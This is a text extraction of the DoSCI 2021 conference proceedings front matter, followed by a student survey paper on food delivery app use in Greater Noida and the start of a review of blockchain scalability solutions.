Professional Documents
Culture Documents
Proceedings of Second Doctoral Symposium On Computational Intelligence
Proceedings of Second Doctoral Symposium On Computational Intelligence
Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Advances in Intelligent Systems and Computing
Volume 1374
Series Editor
Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences,
Warsaw, Poland
Advisory Editors
Nikhil R. Pal, Indian Statistical Institute, Kolkata, India
Rafael Bello Perez, Faculty of Mathematics, Physics and Computing,
Universidad Central de Las Villas, Santa Clara, Cuba
Emilio S. Corchado, University of Salamanca, Salamanca, Spain
Hani Hagras, School of Computer Science and Electronic Engineering,
University of Essex, Colchester, UK
László T. Kóczy, Department of Automation, Széchenyi István University,
Gyor, Hungary
Vladik Kreinovich, Department of Computer Science, University of Texas
at El Paso, El Paso, TX, USA
Chin-Teng Lin, Department of Electrical Engineering, National Chiao
Tung University, Hsinchu, Taiwan
Jie Lu, Faculty of Engineering and Information Technology,
University of Technology Sydney, Sydney, NSW, Australia
Patricia Melin, Graduate Program of Computer Science, Tijuana Institute
of Technology, Tijuana, Mexico
Nadia Nedjah, Department of Electronics Engineering, University of Rio de Janeiro,
Rio de Janeiro, Brazil
Ngoc Thanh Nguyen , Faculty of Computer Science and Management,
Wrocław University of Technology, Wrocław, Poland
Jun Wang, Department of Mechanical and Automation Engineering,
The Chinese University of Hong Kong, Shatin, Hong Kong
The series “Advances in Intelligent Systems and Computing” contains publications
on theory, applications, and design methods of Intelligent Systems and Intelligent
Computing. Virtually all disciplines such as engineering, natural sciences, computer
and information science, ICT, economics, business, e-commerce, environment,
healthcare, life science are covered. The list of topics spans all the areas of modern
intelligent systems and computing such as: computational intelligence, soft comput-
ing including neural networks, fuzzy systems, evolutionary computing and the fusion
of these paradigms, social intelligence, ambient intelligence, computational neuro-
science, artificial life, virtual worlds and society, cognitive science and systems,
Perception and Vision, DNA and immune based systems, self-organizing and
adaptive systems, e-Learning and teaching, human-centered and human-centric
computing, recommender systems, intelligent control, robotics and mechatronics
including human-machine teaming, knowledge-based paradigms, learning para-
digms, machine ethics, intelligent data analysis, knowledge management, intelligent
agents, intelligent decision making and support, intelligent network security, trust
management, interactive entertainment, Web intelligence and multimedia.
The publications within “Advances in Intelligent Systems and Computing” are
primarily proceedings of important conferences, symposia and congresses. They
cover significant recent developments in the field, both of a foundational and
applicable character. An important characteristic feature of the series is the short
publication time and world-wide distribution. This permits a rapid and broad
dissemination of research results.
Indexed by DBLP, INSPEC, WTI Frankfurt eG, zbMATH, Japanese Science and
Technology Agency (JST).
All books published in the series are submitted for consideration in Web of Science.
Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Editors
Deepak Gupta Ashish Khanna
Department of Computer Science Maharaja Agrasen Institute of Technology
Engineering Rohini, Delhi, India
Maharaja Agrasen Institute of Technology
Rohini, Delhi, India Giancarlo Fortino
University of Calabria
Vineet Kansal Rende, Cosenza, Italy
Institute of Engineering and Technology
Lucknow, Uttar Pradesh, India
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature
Singapore Pte Ltd. 2022
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.
This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
Dr. Deepak Gupta would like to dedicate this
book to his father Sh. R. K. Gupta and his
mother Smt. Geeta Gupta for their constant
encouragement, and his family members
including his wife, brothers, sisters and kids,
and to his students close to his heart.
Dr. Ashish Khanna would like to dedicate this
book to his mentors Dr. A. K. Singh and
Dr. Abhishek Swaroop for their constant
encouragement and guidance and his family
members including his mother, wife and kids.
He would also like to dedicate this work to
his (late) father Sh. R. C. Khanna with folded
hands for his constant blessings.
Prof. (Dr.) Vineet Kansal would like to
dedicate this book to his father Sh. Vinod
Kumar and his mother late (Smt.) Usha
Gupta.
Prof. (Dr.) Aboul Ella Hassanien would like
to dedicate this book to his wife Nazaha
Hassan.
DoSCI 2021 Steering Committee Members
Chief Patrons
Patrons
General Chairs
Honorary Chairs
vii
viii DoSCI 2021 Steering Committee Members
Symposium Chairs
Editorial Chairs
Conveners
Publication Chairs
Publicity Chairs
Co-convener
Organizing Chairs
Organizing Team
We hereby are delighted to announce that the Institute of Engineering and Tech-
nology, a constituent college of Dr. A. P. J. Abdul Kalam Technical University,
Lucknow, India, has hosted the eagerly awaited and much coveted Doctoral Sympo-
sium on Computational Intelligence (DoSCI 2021)—An International Conference in
Online Mode. The second version of the symposium was able to attract a diverse range
of engineering practitioners, academicians, scholars and industry delegates, with the
reception of abstracts including more than 1,600 authors from different parts of the
world. The committee of professionals dedicated toward the symposium is striving
to achieve a high-quality technical program with a track on computational intelli-
gence. Therefore, a lot of research is happening in the above-mentioned track and its
related sub-areas. More than 400 full-length papers have been received, among which
the contributions are focused on theoretical, computer simulation-based research
and laboratory-scale experiments. Among these manuscripts, 74 papers have been
included in the Springer proceedings after a thorough two-stage review and editing
process. All the manuscripts submitted to DoSCI 2021 were peer-reviewed by at least
two independent reviewers, who were provided with a detailed review proforma.
The comments from the reviewers were communicated to the authors, who incorpo-
rated the suggestions in their revised manuscripts. The recommendations from two
reviewers were taken into consideration while selecting a manuscript for inclusion
in the proceedings. The exhaustiveness of the review process is evident, given the
large number of articles received addressing a wide range of research areas. The
stringent review process ensured that each published manuscript met the rigorous
academic and scientific standards. It is an exalting experience to finally see these
elite contributions materialize into a book volume as DoSCI 2021 proceedings by
Springer entitled “Doctoral Symposium on Computational Intelligence.”
DoSCI 2021 invited four keynote speakers, who are eminent researchers in the
field of computer science and engineering, from different parts of the world. In addi-
tion to the plenary sessions on the day of the symposium, nine concurrent technical
sessions are held on the day to assure the oral presentation of around 74 accepted
papers. Keynote speakers and session chair(s) for each of the concurrent sessions
have been leading researchers from the thematic area of the session. A technical
xi
xii Preface
exhibition is held during all the day of the symposium, which has put on display
the latest technologies, expositions, ideas and presentations. The research part of the
symposium was organized in a total of 16 special sessions. These special sessions
provided the opportunity for researchers conducting research in specific areas to
present their results in a more focused environment.
An international symposium of such magnitude and release of the DoSCI 2021
proceedings by Springer has been the remarkable outcome of the untiring efforts
of the entire organizing team. The success of an event undoubtedly involves the
painstaking efforts of several contributors at different stages, dictated by their devo-
tion and sincerity. Fortunately, since the beginning of its journey, DoSCI 2021 has
received support and contributions from every corner. We thank them all who have
wished the best for DoSCI 2021 and contributed by any means toward its success.
The edited proceedings volume by Springer would not have been possible without the
perseverance of all the steering, advisory and technical program committee members.
All the contributing authors owe thanks from the organizers of DoSCI 2021 for
their interest and exceptional articles. We would also like to thank the authors of the
papers for adhering to the time schedule and for incorporating the review comments.
We wish to extend our heartfelt acknowledgment to the authors, peer-reviewers,
committee members and production staff whose diligent work put shape to the DoSCI
2021 proceedings. We especially want to thank our dedicated team of peer-reviewers
who volunteered for the arduous and tedious step of quality checking and critique on
the submitted manuscripts. We wish to thank our faculty colleagues Mr. Moolchand
Sharma and Ms. Prerna Sharma for extending their enormous assistance during the
symposium. The time spent by them and the midnight oil burnt is greatly appreciated,
for which we will ever remain indebted. The management, faculties, administrative
and support staff of the college have always been extending their services whenever
needed, for which we remain thankful to them.
Lastly, we would like to thank Springer for accepting our proposal for publishing
the DoSCI 2021 symposium proceedings. Help received from Mr. Aninda Bose, the
acquisition senior editor, in the process has been very useful.
Dr. Deepak Gupta is an eminent academician and plays versatile roles and respon-
sibilities juggling between lectures, research, publications, consultancy, community
service, Ph.D. and post-doctorate supervision, etc. With 13 years of rich expertise in
teaching and two years in industry; he focuses on rational and practical learning.
He has contributed massive literature in the fields of human–computer interac-
tion, intelligent data analysis, nature-inspired computing, machine learning and soft
computing. He is working as Assistant Professor at Maharaja Agrasen Institute of
Technology (GGSIPU), Delhi, India. He has served as Editor-in-Chief, Guest Editor,
Associate Editor in SCI and various other reputed journals. He has authored/edited
44 books with national/international level publishers. He has published 140 scientific
research publications in reputed international journals and conferences including 68
SCI indexed journals. He has also filed 3 patents.
Prof. (Dr.) Vineet Kansal studied at Indian Institute of Technology, Delhi, and
is currently working as Professor with Institute of Engineering & Technology,
Dr. A. P. J. Abdul Kalam Technical University, Lucknow. He was awarded appre-
ciation by NPTEL, IIT Kanpur and Centre of Continuing education, IIT Kanpur
for inspiring the faculty members and students of higher technical education to
xix
xx About the Editors
adopt NPTEL Online certification courses for evangelizing its modus operandi and
for conceptualizing online and offline blended faculty training programs addressing
pedagogical issues in engineering education in the state of Uttar Pradesh, India.
Prof. (Dr.) Aboul Ella Hassanien is Founder and Head of the Egyptian Scientific
Research Group (SRGE). Hassanien has more than 1000 scientific research papers
published in prestigious international journals and over 50 books covering such
diverse topics as data mining, medical images, intelligent systems, social networks
and smart environment. Prof. Hassanien won several awards including the Best
Researcher of the Youth Award of Astronomy and Geophysics of the National
Research Institute, Academy of Scientific Research (Egypt, 1990). He was also
granted a Scientific Excellence Award in Humanities from the University of Kuwait
for the 2004 Award and received the superiority of scientific—University Award
(Cairo University, 2013). Also, he was honored in Egypt as the best researcher at
Cairo University in 2013. He has also received the Islamic Educational, Scientific
and Cultural Organization (ISESCO) prize on Technology (2014) and received the
State Award for Excellence in Engineering Sciences 2015.
Investigation of Consumer Perception
Toward Digital Means of Food Ordering
Services
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 1
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_1
2 A. Srivastava et al.
collected from all the users in Greater Noida who are using the online food ordering
apps and delivery services. Four parameters have been taken into consideration for
analyzing positioning study (perceptual mapping).
1 Introduction
The views of people regarding the online purchase of food are changing very fast. The
e-commerce and E-businesses, with technological advantage, are offering hassle-free
and quick food deliveries to the consumers [5]. In today’s age of advanced information
and technology, consumer perception is being molded and that too into an affirmation
toward online food delivery.
Indians have accepted the new trend of food delivery system via apps which is at
the convenience of their fingertips [6]. One of the explanations behind this new trend
may be the time constraint and hectic corporate lifestyle, which has given boost to
the online food delivery sources. Furthermore, it is the comfort of ordering food from
a variety of restaurants from mobile (Figs. 1 and 2).
2 Literature Review
Sethu and Saini (2016) in one of their papers titled “Customer Perception and Satis-
faction on Ordering Food via Internet” (with special relevancy Manipal univer-
sity) highlighted that online ordering of food saves a lot of time, thereby helping
Fig. 1 Segment overview: global segment sizes. Source Statista Digital Market Outlook (2018)
Investigation of Consumer Perception Toward Digital … 3
the scholars to manage their time proficiently [8]. The researchers and students
have option to order their preferred food from the preferred location at preferred
time. Furthermore, the study reveals that almost all the respondents are using
Internet in their phones or computers, a significant proportion of the respondents
ordered double or a minimum of once per week. Recently, some researchers have
also discovered that the Web surroundings offer nice opportunities for interactive
and individualized selling (Burke, 2002; Wind & Rangaswamy, 2001). According
to a study as compared to offline environment, the online environment offers more
opportunities for personalized and interactive marketing. Furthermore, (Phau & Lo,
2004) states that Internet also offers an impulsive shopping channel to the consumers.
Consumers can now effortlessly search on the Web, various competitive sellers and
products that match their expectation (Singh, 2002). The social media also plays a
role in making purchase decisions. The consumers receive input and feedback from
family, friends, and also from peers via various social media channels such as Insta-
gram, public forums, Facebook, blogs, and Twitter (Herring et al., 2005; Bernoff &
Li, 2008).
The Web site quality is also considered as an important cue for customer satis-
faction [9]. Therefore, in the last decade, the markets have witnessed a drastic
change as far as literature on Web sites is concerned. It is serving as an impor-
tant factor for driving purchase intention. There are many factors which are taken
into consideration to improve the Web site quality. Some of many important factors
include customization, cultivation, choice, interactivity, care, character, community,
convenience, and user-friendliness (Srinivasan et al. 2002); Huang, 2003, also added
complexity, novelty, and interactivity. Furthermore, according to Wirtz and Lihotzky,
2003, the factors like technical integration, individualization, free services, conve-
nience, and community also play important roles. (Chiu et al. 2005) emphasized that
4 A. Srivastava et al.
data quality, interactivity and learning, connectivity playfulness (Chiu et al. 2005);
quality of the content, appearance, technical adequacy, and specific content (Liao
et al. 2006); communication, design, promotion, merchandising, privacy/ security,
and order fulfillment (Jin & Park, 2006); user-friendliness, content quality, transac-
tion speed, and security (Shih & Fang, 2006) are the essential aspects for generating
traffic on the Web site.
Other researchers are of the view that system quality, information quality, and
service quality are the three Web site merits that are expected by the customers to
assist them make online encounters (Shih, 2004).
Additionally, in the online business environment, the Web site design is considered
to be an important factor (Marcus & Gould, 2000), and therefore, the designs by the
businesses are adapted to suit the local values and norms (Gommans et al. 2001).
Security and trust are crucial factor for buyers who intend to purchase products
online directly from the shopping Web sites. Because of this reason, security is
considered as one of the primary concerns by consumers who are buying online
products (Flavian et al. 2006). Furthermore, the perceived value over confidentiality
and security features of the Web sites is very important antecedents of trust, which
are responsible for influencing the behavioral intention of the consumers (Mukherjee
& Nath, 2007). Therefore, in most of the studies, security and privacy of the Web
portals of the e-commerce companies (e-service providers) are one of the primary
concerns which are addressed on priority by these companies (Sathye, 1999; Liao
& Cheung, 2002; Poon, 2008). Confidentiality, in particular, is considered to be an
important element for creating an online belief and trust in any service organization.
(Garrett, 2003) clearly puts forth the concept of Web site design as something which
deals with emotional appeal, aesthetics, uniformity, poise, mix of colors, shapes,
photography, and font style. A few studies (Karvonen, 2000) suggest an association
between trust and aesthetic beauty of the Web sites, even though some of them (Wang
& Emurian, 2005) found noteworthy association between the two. In fact, most of the
empirical studies have shown the positive stance (Tarasewich, 2003), when it comes
to the relationship between Web site aesthetics and enjoyable user experience.
Investigation of Consumer Perception Toward Digital … 5
Chen and Chang (2003) state that online shoppers have a very low tolerance for
system feedback. Yet another study says online buyers wait for only few seconds
(eight seconds) before they leave any Web site (Dellaert & Khan, 1999). As per
Weinberg, 2000, factors like loading time, appearance, and functionality are very
important for any webpage. The Web site design should be trustworthy, user-friendly,
and it should save transaction time of the consumers. The consumers may not use
the online payment system of the portal if it is loading slowly, and the design is
not trustworthy. If the Web site of the e-service provider is designed to serve the
purpose of a salesperson, in that case, the Web site should also focus on certain
skills and qualities of salespersons like expertise, likeability, and strong trust (Hawes
et al., 1989; Doney & Cannon, 1997) as these characteristics are surely linked with
trust of the consumer in the salesperson and the company. It may be noted that Web
site design, information quality, security/privacy, and payment system of that Online
Food Ordering Web site play a role in determining customer’s trust in his online
shopping experiences.
The factor that plays a significant role in generating customer satisfaction is service
quality. In order to measure the loyalty and customer satisfaction, the organiza-
tions are also using yet another important tool called service quality dimensions
(SERVQUAL) tool (Landrum et al., 2009). The concept of service quality dimen-
sions which came into existence in 1988 was introduced by Parasuraman et al. It
is basically a generic instrument which is used for the measurement of service
quality based on the focus group’s inputs. The concept has also been adopted by
many organizations like Web services and libraries (Gede & Sumaedi, 2013; Reichl,
Tuffin & Schatz, 2013; Wang et al., 2014) [10]. According to Juran and Godfrey
(1999), quality is defined as “fitness for use” and “those product features which meet
customer needs and thereby provide customer satisfaction”. However, depending
on the methods of approach driven to transcendental experience, value, manufac-
ture, product, and user, the definition of quality may vary (Gravin, 1984). Rolland
and Freeman (2010) have included the following factors in the concept of service
quality: purchasing of products and services, Web site facilitating effective and effi-
cient shopping, and the type of customer service delivered right from first contact to
fulfillment of the services. Moreover, according to Juga et al. (2010) while service
perceptions influence loyalty, Oliver, 1997, believes that satisfaction represents a
more general evaluative construct than the episodic and transaction-specific nature
of service performance, which mediates linking service quality and a customer’s
re-purchase loyalty (Olsen, 2002). Providing excellent service to the consumers is
6 A. Srivastava et al.
the key sustainable strategy for e-commerce and online food delivery and compa-
nies. Therefore, online food delivery companies focus more on the perceived quality
of the service, as the good quality service always has a larger impact on customer
satisfaction.
The three major dimensions, on the basis of the above discussions, have been
recognized as crucial for retaining and satisfying the consumers. They are delivery,
quality of food, and customer service.
2.5 Delivery
3 Scope of Study
The most important aim of this study as mentioned above is to know and understand
the consumer perception about the online food delivery and ordering services in
Greater Noida. The study will help us in understanding the “Online Food ordering
and Delivery Service Market”. With this study, we will understand the consumer
8 A. Srivastava et al.
perception and key success factors regarding the services various companies provide
in Greater Noida.
Consequently, the findings of this study may also be useful for the online food
delivery companies (online service providers) who after analyzing the results can
work upon on these variables and try to fill up the gaps in the mindset of consumers.
4 Research Methodology
Primary data sources of this study include information collected and processed
directly by the researchers, through questionnaire based on perception of customers
and key success factors for usage of online food delivery apps in Greater Noida.
Secondary data collection includes information from various apps, Internet, jour-
nals, magazines, and research reports. Investigation and observation of the collected
data wer done with the help of computational, mathematical, and statistical tools and
techniques. A well-designed and structured questionnaire with both open-ended and
close-ended questions was prepared.
Questionnaire: The section I of the questionnaire had relevant questions related to
demographic factors like gender, age, and university/college of the students who
willingly accepted to fill the form.
Second section of the questionnaire sheds light on the questions about students’
experience while ordering online food and about the factors affecting their buying
behavior.
Sample Size: 216 respondents (Students).
Research Tools: Following are the research tools which are used to draw conclusions
and to do analysis.
• Cronbach alpha
• Chi square
• Weighted average
• Descriptive analysis multi-item scales (five-point, Likert type) ranging from
strongly agree (5) to strongly disagree (1) are used.
Sampling:
Survey was conducted in four technical and management institutes in Greater Noida.
Non-probability: Convenience sampling method was used.
Hypothesis: H0: No internal consistency exists among the four factors considered
for the usage of online food delivery app.
H1: There exists an internal consistency among the four factors considered for
the usage of online food delivery app.
Investigation of Consumer Perception Toward Digital … 9
Table 1 is presented to understand the behavior of students about the use of online
food delivery apps, and socioeconomic characteristics of the consumers were studied.
These variables are taken into consideration as they affect the consumption pattern
and consumer behavior regarding the usage of food delivery apps. Students were
asked to fill the questionnaire. The demographic profile of the respondents is
represented in the following table.
Users—Food delivery and ordering services apps (Graph 1; Fig. 3):
Interpretation: Analysis of the data shows that 87% of the respondents were using
services of online apps for ordering online food. There were total respondents 216
respondents, and 189 of them were using the online services. However, 27 respon-
dents (13%) revealed that they are not very keen and are not using the online services
for food delivery.
Interpretation:
Above analysis clearly depicts that Zomato has strong position in terms of providing
“Availability of Restaurants” and “Highest Speed of Delivery” in Greater Noida.
Position of Swiggy is good in both the parameters. Food Panda has good positioning
on delivery, but for discount, its position is average. Uber Eats needs to evolve in this
area as Zomato, Swiggy, and Food Panda are the prominent players in the market in
Greater Noida.
Usage
of Apps Number Percentage (%)
Zomato 127 68%
Food Panda 32 17%
Swiggy 25 14%
Uber Eats 5 1%
Total 189 100
Conclusion from the above analysis: We can clearly analyze that Zomato is the
most preferred app followed by Food Panda and Swiggy.
Interpretation:
From the above graph, we can analyze that for Zomato its user-friendly app acts
as a major factor for influencing the usage followed by 24*7 availability. For Food
Panda, customers prefer its app for the discount being offered by them other than
their user-friendly app and 24*7 availability (Graph 2).
Chi-squared test between factors:
Four factors considered during analysis are as follows:
12 A. Srivastava et al.
Graph 2 Major factors and its effect on the usage of food delivery apps
• User-friendly app
• 24*7 availability
• Mode of payment
• Discount offered.
Reliability test
Cronbach’s alpha * Cronbach’s alpha on the given items Number of items (N)
0.852 0.851 4
The item has an alpha coefficient of 0.852, which suggests that the item has a
relatively high internal consistency among four factors.
Findings
Zomato has strong position in the mind of consumers on the factor of highest
“Speed of Delivery” and “No. of Restaurants available”. The strong perception of
the consumer toward speed of delivery is the reason why majority of respondents
decide to choose Zomato over the other apps in Greater Noida.
• Swiggy and Food Panda do not have clear positioning around these factors. They
can map their position on any other factor such as “Discounts Offered” where
Zomato is not preferred choice.
• Uber Eats needs to work hard to expand their market in Greater Noida region and
achieve better responses in near future.
• Zomato is the preferred choice when it comes to online food delivery followed
by Swiggy and Food Panda.
• Consumer preferred Zomato because of its user-friendly app, 24*7 availability,
and easy mode of payment.
Investigation of Consumer Perception Toward Digital … 13
6 Conclusion
References
1. Mustafa, A. B., Balihallimath, H., Bidichandani, N., & Khond, P. M. (2016). Growth of food
tech: A comparative study of aggregator food delivery services in India. In Proceedings of
the 2016 International Conference on Industrial Engineering and Operations Management
Detroit, Michigan, USA, September 23–25, 2016.
2. PTI. (2019, April 1). Zomato expands food delivery business to 213 cities across India.
Economics Times. Retrieved from https://economictimes.indiatimes.com/small-biz/startups/
newsbuzz/zomato-expands-food-delivery-business-to-213-cities-across-india/articleshow/
68672719.cms
3. Van Alstyne, W., Geoffrey, P. G., & Choudary, S. P. (2016). Pipelines, platforms, and the new
rules of strategy. Harvard Business Review, April 2016, 4–6.
4. The online food ordering market in India is likely to grow at over 16 per cent annually to
touch USD 17.02 billion by 2023. Business Standard. Retrieved from https://www.business-
standard.com/article/pti-stories/online-food-ordering-market-may-grow-at-over-16-pc-likely-
to-touch-usd-2023
5. Thyagaraja, G. (2015). Zomato—A case study. International Journal of Business and
Administration Research Review, 3(11), 157–160.
6. Gupta, M. (2019). A study on impact of online food delivery app on Restaurant Business special
reference to Zomato and Swiggy. Retrieved from http://ijrar.com/upload_issue/ijrar_issue_205
42895.pdf
7. McKinsey & Company. (2016). The changing market for food delivery. Retrieved from https://
www.mckinsey.com/industries/high-tech/our-insights/the-changing-market-for-food-delivery
8. Sethu, H.S., &, Saini, B. (2016) Customer perception and satisfaction on ordering food via
internet, a case on Foodzoned.Com, in Manipal. In: Proceedings of the Seventh Asia-Pacific
Conference on Global Business, Economics, Finance and Social Sciences (AP16Malaysia
Conference) ISBN: 978-1-943579-81-5. Kuala Lumpur, Malaysia. 15–17, July 2016. Paper
ID: KL631.
14 A. Srivastava et al.
9. Bhargave, A., Jadhav, N., Joshi, A., Oke, P., & Lahane, S. R. (2013). Digital ordering system
for Restaurant using Android. International Journal of Scientific and Research Publications,
3(4), April 2013.
10. Gede, M.Y.B.I., & Sumaedi, S. (2013). An analysis of library customer loyalty: The role of
service quality and customer satisfaction, a case study in Indonesia. Library Management,
34(6/7), 397–414.
11. Rathore, S., & Chaudhary, M. (2018). Consumer perception on online food ordering.
International Journal of Management & Business Studies, 8(4), Oct–Dec 2018, 12–17.
12. Dholakia, R.R., & Zhao, M. (2010). Retail web site interactivity: how does it influence customer
satisfaction and behavioural intentions?. International Journal of Retail & Distribution
Management, 37(10), 821–838.
13. Barutçu, S. (2010). E-Customer satisfaction in the e-tailing industry: an empirical survey for
turkish e-customers. Ege Akademik Bakis (Ege Academic Review), 10(1), 15–15.
14. Qin, H., Prybutok, V. R., & Zhao, Q. (2010). Perceived service quality in fast-food restaurants:
Empirical evidence from China. International Journal of Quality & Reliability Management,
27(4), 424–437.
A Systematic Review of Blockchain
Technology to Find Current Scalability
Issues and Solutions
Abstract Blockchain technology has proven the success of its security technology
and need for transparency of transaction in the present area. This paper covers
in-depth review of all the existing blockchain technology with its issue, limits
throughput, high latency, storage issues, etc. Blockchain technology having different
variants with different consensus mechanisms, methods, and techniques each have its
own advantage and limitation. In this research review, we also study different existing
solutions for the scalability challenge. There are large number of blockchain scala-
bility solutions are exist but to overcome completely, it requires further research and
more number of scalability solutions.
1 Introduction
Bitcoin, the first application of blockchain technology, is one platform based on peer-
to-peer network architecture used for exchanging cryptocurrency without third party
which has given effective solution for double-spending problem. In decentralized
network, bitcoin adopted proof of work (PoW) consensus mechanism for verifica-
tion of new transactions and blocks [1]. Many digital currencies take place before
bitcoin but they come with some challenges and are also not popular like bitcoin.
Digital currencies in their initial phase had many problems but out of them one most
affecting challenge was double-spending problem. Satoshi Nakamoto settled this
problem by using peer-to-peer distributed network and computational mechanism
that generate the proof of every transactions which can never be changed and remains
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 15
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_2
16 B. K. Chauhan and D. B. Patel
in chain forever. Each transaction contains two mandates for completion, one is digi-
tally signed hash by previous transaction and second is public key of the next owner.
State transition system is used in bitcoin ledger to preserve the ownership status of
present bitcoin where new state is output of state transition function. Each transaction
contains input hash and output hash where output hash of the transaction is used only
once as an input in the entire blockchain. If the output of the transaction has not been
referenced before, it is called an unspent transaction output (UTXO), and referenced
transaction is called a spent transaction output (STXO). Bitcoin presented proof of
work (incrementing a nonce to produce a hash of block) based on SHA 256 hash algo-
rithm for verification of transactions. A block of bitcoin has Merkle tree of transaction
hash [2]. Ethereum is modified and improved platform of blockchain technology after
bitcoin. It is an open-source platform, and different ecosystem can build decentral-
ized applications by using this platform. The unique and very special qualities of
blockchain technology emerged to the technology world by Ethereum platform. It
introduced proof of stake (PoS) consensus mechanism which is more efficient and
low-cost mechanism compared to PoW used in bitcoin. Ethereum created a smart
contracts concept, contains description of rules and regulations that take place on the
blockchain and executed only if rules prescribed in it are satisfied. Ethereum virtual
machine (EVM) executes all smart contracts and no changes would be possible after
smart contract accepted by blockchain. Ethereum platform used Ether as its currency.
The transaction verification takes place by PoS consensus mechanism which modi-
fied the Greedy Heaviest Observed Subtree (GHOST) protocol and consists Keccak
256-bit hash algorithm [2, 3].
Blockchain technology has power to be transparent in the procedure from buying
and selling fresh vegetables to interaction with the government where consensus
mechanism will use to verify authenticity. The blockchain records are stored in
ledger by cryptographic method, and it is traceable and tamper-free [4]. It is not
limited to only cryptocurrency but also reshaped technology world with its specific
features. This technology can convert existing centralized system into more accurate,
secure, and decentralized system [5]. The unique side of this technology is crypto-
graphically secured, transparent, anonymity, auditable, and data integrity without
any third party and that creates the interest on research areas. It did not grow as it
should have grown, because of its technical and legal limitations. Some limitations
are limited scalability, high latency, storage constraints, limited consensus mecha-
nisms, lack of governance, high energy consumption, inadequate tooling, and threat
of quantum computing [6–8]. Bitcoin and smart contract are innovation of blockchain
technology but can process limited number of transactions, and the “blockchain scal-
ing” introduced the third innovation of blockchain technology [9]. Blockchain tech-
nology has Blockchain 1.0 (bitcoin), Blockchain 2.0 (Ethereum), and Blockchain
3.0 (trying to solve challenges of blockchain by different solution techniques) gener-
ations [10]. The decentralization, security, and scalability are three important pillars
of blockchain technology and are called trilemma in blockchain. The scalability
is an important pillar that affects the growth of blockchain technology most [11].
Bitcoin and Ethereum process the limited number of transaction but its popularity
A Systematic Review of Blockchain Technology to Find Current … 17
has been increased as it includes unique features. After bitcoin and Ethereum, the
next generation is trying to solve the limitations of blockchain technology.
Block size of bitcoin is only 1 MB, and it can handle less than 7 tps (transactions
per second). Payment network visa can achieve 47,000 tps and in present situation it
handles hundreds of millions of transactions per day. Suppose size of one transaction
is 300 bytes and bitcoin want to achieve visa level, it would require a throughput
of 8 GB, which would reach to 400 TB of data per year. With this storage capacity,
bitcoin network would support only few nodes that lead centralized network, and
it is completely opposite to decentralized network concept [2]. Bitcoin can process
3–7 tps (transactions per second) with 1 MB block size, and it takes 10 min to mine a
single block. Ethereum handles 15–20 tps [9] but both seen very poor when compared
with visa payment network [12]. The performance of blockchain scalability can be
measured by several key matrices like maximum transactions per second, minimum
confirmation time, and cost per confirmed transaction (CPCT) [13]. The performance
matrices are divided into two categories with different requirements. The categories
are the overall performance metrics for the users and the detailed performance metrics
for the developers. The overall performance matrices for the users include transaction
per second, average response delay, transaction per CPU, transaction per memory
second, transaction per disk I/O, and transaction per network. The detailed perfor-
mance matrices for the developers include peer discovery rate, response rate, trans-
action propagating rate, contract execution time, state updating time, and consensus
cost time [14]. Out of all these performance matrices, the throughput and latency are
the most important matrices that directly influence the users [15].
The ledger type is one parameter that affects the blockchain scalability. Based
on ledger type, architecture of blockchain divided into three parts: single ledger,
multiledger, and interoperability. Ethereum is single-ledger-based public network
platforms. Chain core, Hyperledger Burrow, Hyperledger Sawtooth, Hydrachain,
Hyperledger Iroha, Burst, NEM, BigchainDB, and MultiChain are single-ledger-
based private network platforms. Quorum and Credits are single-ledger-based hybrid
network platforms. Hyperledger Fabric and Oracle are multiledger-based private
network platforms. Elements, Lisk, and Openchain are interoperability-based private
network platform [6]. The leader election and transaction serialization plays impor-
tant role in block generation process. The leader election uses three types of mech-
anisms fixed leaders, a single leader and collective leaders. Hyperledger Fabric has
fixed set of leader nodes that run the PBFT consensus protocol. In Bitcoin-NG, a
18 B. K. Chauhan and D. B. Patel
single leader is selected through PoW, and selected leader verifies the transaction until
new leader is not selected. ByzCoin and Solida use committee election or collec-
tive leader nodes mechanism to reduce the confirmation time [11]. The network
type, leader election mechanism, and ledger type affect the transaction verification
process. In public network, a large number of nodes verify the transaction. While
in private and consortium network, only permissioned or limited number of nodes
verify the transactions. Limited or selected number of nodes complete the transaction
verification process faster compared to large number of nodes.
The blockchain scalability solution is categorized into three different layers Layer
0, Layer 1 (On-chain), and Layer 2 (off-chain). The solution of each layer is divided
into different solution categories [15].
4.1 Layer 0
Layer 0 is having data propagation solutions like Erlay, Kadcast, Velocity, and
bloXroute. It needs improvement in existing protocols as well as required more
solutions.
The block data category is having solutions like SegWit, Bitcoin-Cash, Compact
block relay, Txilm, CUB, and Jidar [15]. Big Block solution can increase throughput
and solve some cost issue but it also increases probability of orphan blocks and
ultimately increases maintenance cost of chain [16]. The digital signature takes up
65% of the transaction space. SegWit solution stores the digital signature outside
of the block to increase tps. It reduces the transaction size by storing the digital
signature separately from block. Increasing the size of block means more transac-
tions per block and is useful to improve performance of blockchain scalability [9].
Segregated Witness (SegWit) also improves the throughput and minimizes the cost
but it increases code complexity and also takes more time to process the transaction
[16]. The consensus category has solutions like Bitcoin-NG, Algorand, Snow white,
